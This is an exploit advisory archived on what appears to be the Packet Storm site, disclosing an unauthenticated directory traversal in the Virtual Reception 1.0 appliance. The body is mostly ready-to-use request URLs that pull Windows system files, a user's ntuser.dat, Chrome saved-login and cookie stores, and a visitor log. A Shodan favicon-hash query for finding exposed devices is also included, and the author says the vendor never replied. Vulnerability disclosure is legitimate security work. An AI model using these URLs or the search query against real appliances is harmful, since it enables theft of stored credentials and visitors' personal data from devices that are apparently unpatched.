what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Virtual Reception 1.0 Directory Traversal

Virtual Reception 1.0 Directory Traversal
Posted Mar 30, 2023
Authored by Spinae

Virtual Reception version 1.0 suffers from a directory traversal vulnerability.

tags | exploit, file inclusion
SHA-256 | 8e6ab59605f1f4d16d9e84559bfbc1cc7334ebb367d1996dfd274122c598c62b

Virtual Reception 1.0 Directory Traversal

Change Mirror Download
# Exploit Title: Virtual Reception v1.0 - Web Server Directory Traversal
# Exploit Author: Spinae
# Vendor Homepage: https://www.virtualreception.nl/
# Version: win7sp1_rtm.101119-1850 6.1.7601.1.0.65792 running on an Intel NUC5i5RY
# Tested on: all

We discovered the web server of the Virtual Reception appliance is prone to
an unauthenticated directory traversal vulnerability. This allows an
attacker to traverse outside the server root directory by specifying files
at the end of a URL request.
This is a NUC5i5RY

http://[ip address]/c:/WINDOWS/System32/drivers/etc/hosts
http://[ip address]/C:/windows/WindowsUpdate.log
...

A user called 'receptie' exists on the Windows system:

http://[ip address]/c:/users/receptie/ntuser.dat
http://[ip address]/c:/users/receptie/ntuser.ini
http://[ip address]/c:/users/receptie/appdata/local/temp/wmsetup.log
...
http://[ip address]/c:/users/receptie/AppData/Local/Google/Chrome/User
Data/Default/Login Data
http://[ip
address]/c:/users/receptie/AppData/Local/Google/Chrome/User%20Data/Local%20State
http://[ip address]/c:/users/receptie/AppData/Local/Google/Chrome/User
Data/Default/Cookies
...

The appliance also keeps a log of the visitors that register at the
entrance:

http://[ip address]/visitors.csv

hash icon for shodan searches:

https://www.shodan.io/search?query=http.favicon.hash%3A656388049

No reply from the vendor (phone, email, website form submissions), first
reported in 2021.

--
DISCLAIMER: Unless indicated otherwise, the information contained in this
message is privileged and confidential, and is intended only for the use of
the addressee(s) named above and others who have been specifically
authorized to receive it. If you are not the intended recipient, you are
hereby notified that any dissemination, distribution or copying of this
message and/or attachments is strictly prohibited. The company accepts no
liability for any damage caused by any virus transmitted by this message.
Furthermore, the company does not warrant a proper and complete
transmission of this information, nor does it accept liability for any
delays. If you have received this message in error, please contact the
sender and delete the message. Thank you.

Login or Register to add favorites

File Archive:

September 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    261 Files
  • 2
    Sep 2nd
    17 Files
  • 3
    Sep 3rd
    38 Files
  • 4
    Sep 4th
    52 Files
  • 5
    Sep 5th
    23 Files
  • 6
    Sep 6th
    27 Files
  • 7
    Sep 7th
    0 Files
  • 8
    Sep 8th
    1 Files
  • 9
    Sep 9th
    16 Files
  • 10
    Sep 10th
    38 Files
  • 11
    Sep 11th
    21 Files
  • 12
    Sep 12th
    40 Files
  • 13
    Sep 13th
    18 Files
  • 14
    Sep 14th
    0 Files
  • 15
    Sep 15th
    0 Files
  • 16
    Sep 16th
    21 Files
  • 17
    Sep 17th
    0 Files
  • 18
    Sep 18th
    0 Files
  • 19
    Sep 19th
    0 Files
  • 20
    Sep 20th
    0 Files
  • 21
    Sep 21st
    0 Files
  • 22
    Sep 22nd
    0 Files
  • 23
    Sep 23rd
    0 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close